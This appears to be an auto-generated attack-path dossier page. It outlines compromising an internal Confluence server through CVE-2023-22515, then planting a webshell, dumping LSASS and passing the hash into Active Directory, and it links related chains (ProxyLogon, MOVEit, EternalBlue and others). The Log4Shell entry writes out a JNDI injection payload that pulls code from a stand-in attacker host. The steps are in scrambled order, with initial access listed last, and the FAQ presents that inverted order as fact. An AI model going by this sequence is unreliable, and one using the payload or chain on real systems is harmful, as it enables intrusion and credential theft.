Unpatched Confluence (CVE-2023-22515) → internal foothold
Internal Confluence instance reachable from the corporate VLAN. Trivial privilege-escalation CVE creates an admin user; webshell uploaded; pivot into AD service accounts.
§ Context
Assumed environment: foothold on the corporate LAN. Confluence Server / DC reachable internally and not patched for the 2023 broken-access-control bug.
§ Steps
- 01Pivot to AD via captured credsLateral MovementT1550.002— Pass the Hash
- 02Identify vulnerable versionReconnaissanceW-RECON-FINGERPRINT— Tech Stack Fingerprinting
- 03Upload malicious plugin → webshellPersistenceW-WEBSHELL— Webshell Deployment
- 04Find Confluence on internal networkDiscoveryN-NMAP-INTERNAL— Internal Nmap Sweep
- 05Dump LSASS for service accountCredential AccessW-LSASS-PROCDUMP— LSASS via procdump / comsvcs.dll
- 06Create admin via /setup-* endpointInitial AccessSAAS-ATLAS-CVE— Atlassian Confluence / Jira RCE
§ References
- T1550.002Pass the Hash
§ Frequently asked
- What is the "Unpatched Confluence (CVE-2023-22515) → internal foothold" attack path?
- Internal Confluence instance reachable from the corporate VLAN. Trivial privilege-escalation CVE creates an admin user; webshell uploaded; pivot into AD service accounts. It chains 6 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is Pivot to AD via captured creds (T1550.002) — a lateral movement primitive. Assumed environment: foothold on the corporate LAN.
- What is the final impact of this kill-chain?
- The final step lands on Create admin via /setup-* endpoint (SAAS-ATLAS-CVE), which falls under Initial Access. From here, an operator typically pivots into post-exploitation or maintains persistence.
- How can defenders detect or prevent this attack?
- Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.
§ Related dossiers
- Shared techniques3
ProxyLogon → webshell on Exchange → DA
Unauth SSRF + auth bypass against on-prem Exchange (CAS) — write a webshell as SYSTEM on the Exchange server, dump LSASS for cached domain creds, pivot to DA.
- Shared techniques3
ProxyShell → SYSTEM on Exchange → DA
Pre-auth ProxyShell chain (path confusion + EWS email-to-PowerShell + arbitrary file write) deploys a webshell as SYSTEM. Same post-exploitation as ProxyLogon.
- Shared techniques3
Jenkins /script Groovy console → RCE → AD
Jenkins script console exposed unauth on the corporate intranet — Groovy 'execute()' = RCE as the Jenkins service account, often a domain user with broad agent access.
- Shared techniques2
MOVEit Transfer (CVE-2023-34362) → mass data exfil (Cl0p)
Pre-auth SQLi in MOVEit's web UI forges an admin session. .NET deserialisation chain drops a webshell as SYSTEM. Cl0p's 2023 mass-exfil playbook: download every file under /var/files.
- Shared techniques2
EternalBlue (MS17-010) → SMBv1 wormable spread
Unpatched Windows 7 / Server 2008 with SMBv1 enabled — pre-auth kernel RCE. Used by WannaCry / NotPetya in 2017, still found on enclave / industrial networks.
- Shared techniques2
Log4Shell (CVE-2021-44228) → RCE → lateral
Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.